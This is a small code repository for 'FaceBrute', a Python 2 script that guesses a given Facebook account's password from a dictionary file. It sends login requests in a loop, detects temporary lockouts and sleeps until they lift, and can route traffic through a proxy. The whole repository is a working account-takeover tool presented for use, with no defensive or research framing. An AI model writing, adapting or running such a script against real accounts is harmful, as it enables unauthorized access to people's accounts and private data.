├── .gitignore ├── LICENSE ├── README └── facebrute.py /.gitignore: -------------------------------------------------------------------------------- 1 | #Ignore dictionaries folder 2 | dictionaries/ 3 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (C) 2012 by Edgar Merino (http://devio.us/~emerino) 2 | 3 | Licensed under the Artistic License 2.0 (The License). 4 | You may not use this file except in compliance with the License. 5 | You may obtain a copy of the License at: 6 | 7 | http://www.perlfoundation.org/artistic_license_2_0 8 | 9 | THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER AND CONTRIBUTORS "AS 10 | IS" AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE IMPLIED 11 | WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR 12 | NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL 13 | LAW. UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL 14 | BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL 15 | DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF 16 | ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 17 | 18 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | FaceBrute 2 | Facebook brute force script 3 | 4 | This script tries to guess passwords for a given facebook 5 | account using a list of passwords (dictionary). 6 | Since facebook temporaly blocks access to accounts that 7 | continously fail to login, this script is coded so 8 | that it waits a specified amount of time when this happens 9 | until the lock on the account is released. 10 | 11 | 12 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 13 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 14 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS 15 | FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 16 | OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 17 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED 18 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 19 | PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 20 | LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 21 | NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 22 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 23 | 24 | 25 | 26 | Usage: 27 | 28 | facebrute.py -u username -p passdb.list [-e encoding] [-P proxy:port] 29 | -------------------------------------------------------------------------------- /facebrute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # coding: utf-8 3 | # 4 | # FaceBrute 5 | # Facebook brute force script 6 | # 7 | # This script tries to guess passwords for a given facebook 8 | # account using a list of passwords (dictionary). 9 | # Since facebook temporaly blocks access to accounts that 10 | # continously fail to login, this script is coded so 11 | # that it waits a specified amount of time when this happens 12 | # until the lock on the account is released. 13 | # 14 | # 15 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 16 | # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 17 | # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS 18 | # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 19 | # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 20 | # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED 21 | # TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 22 | # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 23 | # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 24 | # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 25 | # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 26 | 27 | 28 | __author__ = "emerino " 29 | __version__ = "0.3" 30 | 31 | import time 32 | import getopt 33 | import sys 34 | import httplib 35 | import urllib 36 | import re 37 | 38 | HEADERS = { 39 | "Content-type": "application/x-www-form-urlencoded", 40 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 41 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1", 42 | # "Accept-Encoding": "gzip, deflate", 43 | "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 44 | "Cookie": "locale=es_LA" 45 | } 46 | 47 | DATA = { 48 | "return_session": 0, 49 | "legacy_return": 1, 50 | "display": "", 51 | "session_key_only": 0, 52 | "trynum": 1, 53 | "timezone": 360, 54 | "persistent": 1, 55 | "default_persistent": 1, 56 | "login": "Entrar" 57 | } 58 | 59 | def main(argv): 60 | error, options = parse_args(argv) 61 | 62 | if error or "help" in options: 63 | usage() 64 | return 65 | 66 | DATA["email"] = options["username"] 67 | 68 | host = "www.facebook.com" 69 | port = 80 70 | resource = "/login.php" 71 | 72 | if "proxy" in options: 73 | host, port = options["proxy"].split(":") 74 | resource = "http://www.facebook.com/login.php" 75 | 76 | running = True 77 | waiting = False 78 | found = False 79 | count = 1 80 | 81 | while running: 82 | if not waiting: 83 | count = 1 84 | passwd = unicode(options["passdb"].readline().strip(), options["encoding"]) 85 | 86 | if not passwd: 87 | break 88 | 89 | try: 90 | waiting = False 91 | print "Trying: {0}".format(passwd.encode(options["encoding"])) 92 | 93 | 94 | conn = httplib.HTTPConnection(host, port) 95 | 96 | # needs to be encoded in utf-8 for urlencode 97 | DATA["pass"] = passwd.encode("utf-8") 98 | params = urllib.urlencode(DATA) 99 | 100 | conn.request("POST", resource, params, HEADERS) 101 | response = conn.getresponse() 102 | 103 | response = response.read() 104 | conn.close() 105 | 106 | if len(response.strip()) == 0: 107 | found = True 108 | print "SUCCESS: {0}".format(passwd.encode(options["encoding"])) 109 | break 110 | elif response.find("menudo") != -1: 111 | waiting = True 112 | print "Waiting..." 113 | time.sleep(60 * count) 114 | 115 | count += 1 116 | except Exception, err: 117 | print "An error ocurred: ", str(err) 118 | 119 | if not found: 120 | print "FAILED: None of the provided passwords worked!" 121 | 122 | def parse_args(argv): 123 | options = { "encoding": "utf-8" } 124 | error = False 125 | 126 | try: 127 | opts, args = getopt.getopt(argv, "u:p:e:P:h", ["username=", "passdb=", "encoding=", "proxy=", "help"]) 128 | 129 | for opt, arg in opts: 130 | if opt in ("-u", "--username"): 131 | options["username"] = arg 132 | elif opt in ("-p", "--passdb"): 133 | options["passdb"] = open(arg) 134 | elif opt in ("-e", "--encoding"): 135 | options["encoding"] = arg 136 | elif opt in ("-P", "--proxy"): 137 | if not re.search("^(\w+|\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):\d+$", arg): 138 | raise Exception("Invalid format for proxy, should be host:port") 139 | 140 | options["proxy"] = arg 141 | elif opt in ("-h", "--help"): 142 | options["help"] = True 143 | else: 144 | error = True 145 | except Exception, err: 146 | error = True 147 | print str(err) 148 | 149 | if "username" not in options or "passdb" not in options: 150 | error = True 151 | 152 | return error, options 153 | 154 | def usage(): 155 | print """Facebook Brute Forcer v{0} 156 | 157 | 158 | Usage: 159 | 160 | facebrute.py -u email -p passdb.list [-e encoding] [-P proxy:port]""".format(__version__) 161 | 162 | if __name__ == "__main__": 163 | main(sys.argv[1:]) 164 | --------------------------------------------------------------------------------